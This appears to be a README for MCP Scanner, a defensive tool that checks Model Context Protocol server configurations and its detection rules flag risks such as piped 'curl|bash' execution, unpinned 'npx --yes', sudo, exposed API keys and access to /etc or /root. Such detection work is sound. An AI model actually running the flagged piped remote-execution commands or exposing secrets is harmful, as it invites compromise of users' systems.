Security scanner for MCP (Model Context Protocol) servers. Detect malicious tools, data exfiltration, and supply chain risks before connecting an MCP server to your AI agent.
MCP servers give AI agents (Claude Code, Cursor, Copilot) direct access to tools, filesystems, and APIs. But nobody is checking if those servers are safe.
MCP Scanner analyzes:
- MCP server config files (Claude Code, Cursor, generic)
- Command-level risks (
npx --yes,curl|bash,sudo) - Secret exposure in environment variables
- Filesystem and network access patterns
- Source code of MCP server implementations (with AgentGuard integration)
pip install dfx-mcp-scanner
# Scan your Claude Code MCP config
mcp-scanner
# Scan a specific config
mcp-scanner ~/.cursor/mcp.json
# JSON output
mcp-scanner .mcp.json --format json| Rule | Severity | Description |
|---|---|---|
| Remote code execution | CRITICAL | `curl |
| Auto-install packages | HIGH | npx --yes without version pinning |
| Privileged execution | CRITICAL | Server running as root/sudo |
| Secret exposure | CRITICAL | Real API keys/tokens in config env vars |
| Host filesystem access | HIGH | Server accessing /etc, /root, /proc |
| External network access | MEDIUM | Server connecting to non-localhost URLs |
| Excessive tool count | LOW | Server registering >20 tools |
- Claude Code (
~/.claude/claude_code_config.json) - Cursor (
~/.cursor/mcp.json) - Project-level (
.mcp.json) - Generic MCP server configs
When AgentGuard is installed, MCP Scanner performs deep source code analysis on MCP server implementations using all 10 OWASP ASI detection rules.
MIT - see LICENSE.
Built by Dockfix Labs.